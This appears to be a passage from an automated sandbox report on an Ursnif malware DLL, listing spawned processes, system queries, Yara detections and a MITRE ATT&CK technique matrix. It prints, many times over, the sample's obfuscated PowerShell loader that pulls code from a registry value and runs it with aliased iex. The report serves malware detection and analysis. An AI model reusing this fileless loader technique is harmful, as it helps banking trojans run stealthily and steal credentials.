            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6.dll",#1Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES451.tmp" "c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BF.tmp" "c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES148E.tmp" "c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP"
            Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B16.tmp" "c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: unknown unknown
            Source: C:\Windows\System32\control.exeProcess created: unknown unknown
            Source: C:\Windows\System32\control.exeProcess created: unknown unknown
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F1A303 cpuid 4_2_00F1A303
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F13A79 HeapFree,GetSystemTimeAsFileTime,HeapFree,4_2_00F13A79
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F14638 GetVersion,lstrcat,lstrcat,lstrcat,GetLastError,4_2_00F14638
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F1A303 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,4_2_00F1A303

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation2DLL Side-Loading1DLL Side-Loading1Obfuscated Files or Information1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsCommand and Scripting Interpreter1Boot or Logon Initialization ScriptsProcess Injection511DLL Side-Loading1LSASS MemoryAccount Discovery1Remote Desktop ProtocolEmail Collection1Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Masquerading1Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion21NTDSSystem Information Discovery25Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection511LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonRegsvr321Cached Domain CredentialsSecurity Software Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncVirtualization/Sandbox Evasion21Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemProcess Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
